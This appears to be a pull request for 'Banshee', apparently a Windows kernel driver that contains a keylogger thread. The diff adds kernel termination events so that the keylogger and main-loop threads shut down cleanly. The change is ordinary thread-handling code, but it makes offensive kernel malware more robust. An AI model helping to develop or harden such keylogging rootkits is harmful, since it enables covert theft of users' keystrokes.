### PR TITLE
Implement correct thread cleanup + error handling

### DIFF
--- a/Banshee/Globals.hpp
+++ b/Banshee/Globals.hpp
@@ -82,6 +82,9 @@ namespace BeGlobals
     bool shutdown = false;
     bool logKeys = false;
 
+    KEVENT hKeyLoggerTerminationEvent;
+    KEVENT hMainLoopTerminationEvent;
+
     NTSTATUS
     BeInitGlobals()
     {
@@ -161,6 +164,10 @@ namespace BeGlobals
 
         BeCreateSharedMemory();
         LOG_MSG("Created shared memory\n");
+
+        KeInitializeEvent(&BeGlobals::hKeyLoggerTerminationEvent, NotificationEvent, FALSE);
+        KeInitializeEvent(&BeGlobals::hMainLoopTerminationEvent, NotificationEvent, FALSE);
+        LOG_MSG("Initialised termination events\n");
 
         return STATUS_SUCCESS;
     }

--- a/Banshee/Keylogger.hpp
+++ b/Banshee/Keylogger.hpp
@@ -468,6 +468,7 @@ BeKeyLoggerFunction(IN PVOID StartContext)
 		
 		if (BeGlobals::shutdown)
 		{
+            KeSetEvent(&BeGlobals::hKeyLoggerTerminationEvent, IO_NO_INCREMENT, FALSE);
 			PsTerminateSystemThread(STATUS_SUCCESS);
 		}
 


### PR DESCRIPTION
Previously a timer was used, here we wait on the objects properly and also handle failure during DriverEntry.